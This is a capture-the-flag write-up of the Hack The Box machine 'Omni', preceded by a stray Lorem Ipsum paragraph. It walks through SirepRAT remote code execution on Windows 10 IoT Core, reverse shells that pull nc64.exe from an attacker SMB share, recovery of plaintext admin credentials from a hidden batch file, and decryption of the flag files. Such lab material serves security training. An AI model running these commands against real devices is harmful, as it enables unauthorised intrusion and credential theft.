“Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry’s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.”
██╗ ██╗███████╗███████╗██████╗ ██║ ██║██╔════╝██╔════╝██╔══██╗ ██║ ██║███████╗█████╗ ██████╔╝ ██║ ██║╚════██║██╔══╝ ██╔══██╗ ╚██████╔╝███████║███████╗██║ ██║ ╚═════╝ ╚══════╝╚══════╝╚═╝ ╚═╝
root@nidus:/git/htb# nmap -Pn -sC -sV -n 10.10.10.194 PORT STATE SERVICE VERSION 135/tcp open msrpc Microsoft Windows RPC 5985/tcp open wsman 8080/tcp open upnp Microsoft IIS httpd | http-auth: | HTTP/1.1 401 Unauthorized0D |_ Basic realm=Windows Device Portal |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Site doesn’t have a title. 29817/tcp open unknown 29819/tcp open unknown 29820/tcp open unknown Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Visiting port 8080 we are met with a login prompt to “Windows Device Portal”. Googling about it the default credentials are Administrator:p@ssw0rd however they do not work. Reading more tells us this is for OS Windows 10 IoT Core, on Raspberry Pie.
There are known vulnerabilities and exploits for Win 10 IoT Core, one among them is SirepRAT giving the attacker unauthenticated RCE. Reading the In-Depth paper of IoT Core (Linked below) you’ll find a lot of great information regarding the webserver, how to change Administrator password etc.
Download SirepRAT and start to poke the target to verify code execution. I tried to change the Administartor password but got “Access is denied”, confirming RCE.
root@nidus:/git/htb/omni/SirepRAT# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –as_logged_on_user –cmd “C:.exe” –args ” /c net user Administrator 123Abc!” <HResultResult | type: 1, payload length: 4, HResult: 0x0> <OutputStreamResult | type: 11, payload length: 53, payload peek: ‘System error 5 has occurred.Access is denied.’>
Get a reverse shell, easiest in my opinion is to use nc64.exe from your own SMB-share to trigger a shell. root@nidus:/git/htb/omni/SirepRAT# python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput –return_output –as_logged_on_user –cmd “C:.exe” –args ” /c //10.10.14.4/pub-share/nc64.exe 10.10.14.4 4488 -e powershell”
root@nidus:~# rlwrap nc -lvnp 4488 listening on [any] 4488 … connect to [10.10.14.4] from (UNKNOWN) [10.10.10.204] 49672 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
PS C:>
Enumerate the box and instantly we notice that “whoami” doesn’t work, nor do we have any valid users in C:. We can confirm the user by running “$env:UserName” - giving us user DefaultAccount.
PS C:> $env:UserName $env:UserName DefaultAccount
PS C:> Get-PSDrive Get-PSDrive
Name Used (GB) Free (GB) Provider Root Alias Alias C 1.04 0.54 FileSystem C:\ Cert Certificate \ D FileSystem D:\ Env Environment Function Function HKCU Registry HKEY_CURRENT_USER HKLM Registry HKEY_LOCAL_MACHINE U 0.51 4.37 FileSystem U:\ Variable Variable WSMan WSMan With further enumeration we find Users-directories in both C:and U:- however none contain any relevant information. I got stuck here for a good while and started to look back on previous boxes, and found that on the box Resolute (also created by egre55) there was a hidden file containing valuable data.
So I started to look in every directory for hidden files, and voiala!
PS C:Files> get-childitem -Path [rs]* -Force get-childitem -Path [rs]* -Force
Directory: C:Files
Mode LastWriteTime Length Name -a-h– 8/21/2 020 12:56 PM 247 r.bat PS C:Files> type r.bat type r.bat @echo off
:LOOP
for /F “skip=6” %%i in (‘net localgroup “administrators”’) do net localgroup “administrators” %%i /delete
net user app mesh5143 net user administrator _1nt3rn37ofTh1nGz
ping -n 3 127.0.0.1
cls
GOTO :LOOP
:EXIT
Change user from DefaultAccount to Administrator and look for user- and root.txt.
PS C:> $env:UserName DefaultAccount PS C:> $env:computername omni PS C:> $user = ‘omni’ PS C:> $pass = ’_1nt3rn37ofTh1nGz’ | ConvertTo-SecureString -AsPlainText -Force PS C:> \(creds = New-Object System.Management.Automation.PSCredential(\)user,$pass) PS C:> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock { $env:UserName } Administrator PS C:Files> Invoke-Command -ComputerName localhost -Credential $creds -ScriptBlock { //10.10.14.4/pub-share/nc64.exe 10.10.14.4 4499 -e powershell }
root@nidus:/git/htb/omni# rlwrap nc -lvnp 4499 listening on [any] 4499 … connect to [10.10.14.4] from (UNKNOWN) [10.10.10.204] 49679 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\Data\Users\administrator\Documents> $env:UserName
Administrator
Looking for root.txt we can see that it’s some how encrypted, same goes with user.txt.
PS C:> type root.txt flag
PS C:> type user.txt flag
Looking for ways to decrypt this is googled ‘powershell password decrypt’ and found a Microsoft Devblog covering the subject. However following the blog post trying to decrypt the files doesn’t work. Both root- and user.txt gives the same error: “Import-CliXml : Error occurred during a cryptographic operation.”
PS C:> $Credz = Import-CliXml -Path C:.txt $Credz = Import-CliXml -Path C:.txt Import-CliXml : Error occurred during a cryptographic operation. At line:1 char:10 + $Credz = Import-CliXml -Path C:.txt + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic Exception + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept ion,Microsoft.PowerShell.Commands.ImportClixmlCommand
PS C:> $Credz = Import-CliXml -Path C:.txt $Credz = Import-CliXml -Path C:.txt Import-CliXml : Error occurred during a cryptographic operation. At line:1 char:10 + $Credz = Import-CliXml -Path C:.txt + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : NotSpecified: (:) [Import-Clixml], Cryptographic Exception + FullyQualifiedErrorId : System.Security.Cryptography.CryptographicExcept ion,Microsoft.PowerShell.Commands.ImportClixmlCommand
Googling about this it tells that the issue is because of missing machine key in web.config, exact quote: “For anyone who hasn’t solved their problem, I was missing the”machineKey” entry for encrypt/decrypt in my web.config”
So web.config, lets try to approach this from the webb app on port 8080, login with app:mesh5143. Press ‘Processes’ > ‘Run Command’ and get a reverse shell from your local SMB-share: //10.10.14.4/pub-share/nc64.exe 10.10.14.4 4499 -e powershell
root@nidus:/git/htb/omni# rlwrap nc -lvnp 4499 listening on [any] 4499 … connect to [10.10.14.4] from (UNKNOWN) [10.10.10.204] 49705 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
PS C:> $env:UserName app PS C:> $Credz = Import-CliXml -Path C:.txt PS C:> $Credz.GetNetworkCredential().Password 7cfd50f6bc34db3204898f1505ad9d70
Finally, we got user.txt.
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██████╗ ██████╗ ██████╗ ████████╗ ██╔══██╗██╔═══██╗██╔═══██╗╚══██╔══╝ ██████╔╝██║ ██║██║ ██║ ██║ ██╔══██╗██║ ██║██║ ██║ ██║ ██║ ██║╚██████╔╝╚██████╔╝ ██║ ╚═╝ ╚═╝ ╚═════╝ ╚═════╝ ╚═╝
As we already have the credentials for Administrator, login again on port 8080 (administrator:_1nt3rn37ofTh1nGz) and repeat the process to grab root.txt.
Press ‘Processes’ > ‘Run Command’ and get a reverse shell from your local SMB-share: //10.10.14.4/pub-share/nc64.exe 10.10.14.4 4499 -e powershell
root@nidus:/git/htb/omni# rlwrap nc -lvnp 4499 listening on [any] 4499 … connect to [10.10.14.4] from (UNKNOWN) [10.10.10.204] 49705 Windows PowerShell Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\windows\system32> $env:UserName
Administrator
PS C:\windows\system32> $Credz = Import-CliXml -Path C:\Data\Users\administrator\root.txt
PS C:\windows\system32> $Credz.GetNetworkCredential().Password
5dbdce5569e2c4708617c0ce6e9bf11d
██████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████
██╗███╗ ██╗███████╗ ██████╗ ██████╗ ███╗ ███╗ █████╗ ████████╗██╗ ██████╗ ███╗ ██╗ ██║████╗ ██║██╔════╝██╔═══██╗██╔══██╗████╗ ████║██╔══██╗╚══██╔══╝██║██╔═══██╗████╗ ██║ ██║██╔██╗ ██║█████╗ ██║ ██║██████╔╝██╔████╔██║███████║ ██║ ██║██║ ██║██╔██╗ ██║ ██║██║╚██╗██║██╔══╝ ██║ ██║██╔══██╗██║╚██╔╝██║██╔══██║ ██║ ██║██║ ██║██║╚██╗██║ ██║██║ ╚████║██║ ╚██████╔╝██║ ██║██║ ╚═╝ ██║██║ ██║ ██║ ██║╚██████╔╝██║ ╚████║ ╚═╝╚═╝ ╚═══╝╚═╝ ╚═════╝ ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝ ╚═╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═══╝
In-Depth of IoT Core https://www.blackhat.com/docs/us-16/materials/us-16-Sabanal-Into-The-Core-In-Depth-Exploration-Of-Windows-10-IoT-Core-wp.pdf
Exploit IoT Core https://www.zdnet.com/article/new-exploit-lets-attackers-take-control-of-windows-iot-core-devices/
SirepRAT https://github.com/SafeBreach-Labs/SirepRAT
Decrypt PowerShell https://devblogs.microsoft.com/scripting/decrypt-powershell-secure-string-password/
Decrypt Error: https://stackoverflow.com/questions/25857577/error-occurred-during-a-cryptographic-operation-when-decrypting-forms-cookie